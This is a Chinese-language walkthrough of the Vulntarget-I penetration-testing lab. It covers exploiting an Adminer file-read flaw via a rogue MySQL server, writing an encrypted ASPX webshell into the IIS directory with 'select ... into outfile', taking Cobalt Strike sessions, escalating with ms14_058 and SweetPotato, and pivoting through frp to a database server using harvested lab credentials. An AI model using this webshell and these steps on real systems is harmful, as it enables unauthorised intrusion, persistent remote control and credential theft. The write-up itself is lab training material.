Vulntarget-I

探测80端口是iis的默认页面

然后转到8000端口

进行了目录扫描发现了adminer

然后根据网上的adminer漏洞有一个任意文件读取

也没复现出来,然后看的wp跟着成功了

首先现在本地的mysql开启外连

1
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;

然后创建一个database和一张表来收集数据

1
create database adminer; create table test(text text(4096));

然后就在该adminer页面上登录自己的mysql

如果想读配置文件的话需要相关的绝对路径

所以根据该系统是phpstudy搭建的,而且根据下面的插件的提示apache版本为2.4.39

在根据本地自己的phpstudy的文件位置

就可以根据相对路径读取该0localhost_8000.conf

1
load data local infile "../../Extensions/Apache2.4.39/conf/vhosts/0localhost_8000.conf" into table test FIELDS TERMINATED BY '\n';

然后根据爆出来的路径C:/php/adsdrsdfv就可以读取该系统phpstudy数据库的配置文件了

1
load data local infile "C:\\php\\adsdrsdfv\\config\\config_db.php" into table test FIELDS TERMINATED BY '\n';

然后就退出自己的mysql,然后登录该系统的mysql进行操作

尝试日志getshell

1
show variables like '%general%'
1
2
set global general_log="on"
set global general_log_file="c:\php\WWW\shell.php"

结果发现不可写入

1
show variables like "secure_file_priv"

参数为空可读可写

1
select load_file('C:/Windows/System32/inetsrv/config/applicationHost.config')

发现了iis的路径

1
C:\vulnIIS\俱乐部

发现GBK写不进去

通过插件修改编码

1
2
select '<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); /*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
' into outfile 'C:/vulnIIS/俱乐部/1.aspx';

虽然报错但是还是可以连接

尝试上线CS

然后利用cs插件进行提权

然后运行ms14_058进行提权

进行md5解密

找到了vulntarget的密码

开启rdp进行登录

1
2
3
* Username : vulntarget
* Domain : WIN-4IFSVMIDDEF
* Password : 123.com

然后进行fscan大嫂描

注意:这里的第二台windows server2008 注意网卡的配置的先后顺序,是固定写死了的

发现了135存在80服务和8000服务

因此构建代理进行浏览

进行了目录扫描等一系列操作,最后也只仅仅拿到了一个siteserver的图标

于是返回刚刚那台机器继续进行信息搜集

在搜狗浏览器中找到了一组用户密码

1
administrator/8B..123admin

进行照猫画虎

1
http://10.0.1.135:8000/siteserver/pagelogin.cshtml

成功进入后台,根据下面的文章进行getshell

https://www.freebuf.com/articles/web/195105.html

另一种方法就是:

在这里加上可以上传aspx文件

然后在上传一句话木马

这里保存的路径在机器上是这样的(少了t_)

然后成功上线cs

然后通过SweetPotato再次执行木马程序,提权到system

然后跑出了admin的密码

1
2
3
4
wdigest :	
* Username : Administrator
* Domain : WIN-A2F5IDCJ9KO
* Password : zxcvbnm

然后开启RDP进行远程登录

然后开启fscan大保健

扫到了10.0.10.102这台机器因此尝试构建多层frp代理

在web.config中找到了数据库密码

1
<add key="ConnectionString" value="Server=10.0.10.102;Uid=xiaopao;Pwd=123.com;Database=sscmstest;" />

顺便找到了sa的密码

1
QwE123asd

然后MDUT直接连上

sweetpotato.exe提权

然后利用第二台机器进行中转生成listener,生成木马进行上线